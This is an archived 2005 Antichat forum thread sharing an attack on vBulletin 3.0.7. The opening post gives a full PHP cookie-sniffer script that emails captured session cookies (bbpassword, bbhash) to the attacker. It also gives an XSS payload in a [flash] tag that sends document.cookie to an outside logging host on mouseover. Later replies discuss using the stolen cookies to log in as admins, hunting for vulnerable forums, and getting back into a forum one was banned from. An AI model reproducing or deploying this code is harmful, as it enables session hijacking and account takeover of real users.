Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   Vbulletin 3.0.7 -- Cookie (https://forum.antichat.xyz/showthread.php?t=9967)

néM3S!s 10.10.2005 16:06
Vbulletin 3.0.7 -- Cookie
 
Vbulletin 3.0.7 --> catch cookie (ie)
Only if the balise [flash] is used :(

Create a file log.php and insert the following code :

Код:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get Cookies And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies
[ MSG ]
Name : Attack1
Cookies : Cookies
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "devil-00@hotmail.co.uk";  // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ]  ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki    _e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log-v1@s4a.cc>";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ devil-00@hotmail.co.uk - devil.00@gmail.com ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/**************************************************      ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>
To add following a message that you post on the forum targets the following code :

Код:
[flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]
Good work ! :D

Дрэгги 11.10.2005 00:08
What is this all about? I'm really curious!

PEPSICOLA 11.10.2005 00:42
how i see... its a article (or something =)) how to steal cookies in vbulletin 3.0.7, but only if the balise [flash] is used... =)

and if flash is used, you just need post message (look néM3S!s post)... короче на снифер

and when your mouse over the flash - cookie will send to sniffer, right? =)

néM3S!s 11.10.2005 12:48
yes it is exactly that :)

byte57 12.10.2005 04:52
respect, i'll try to find forums with flash, if somebody already did, give some links here plz.

Дрэгги 14.10.2005 21:38
And what's the use of stealing cookies? To be automatically logged in as another member (admin, for example) there, right?

I'm not sure this will help me to be back on that forum I was banned from though, because it's not vbulletin 3.0.7 it's 3.5.0 as well as I remember...


Время: 12:33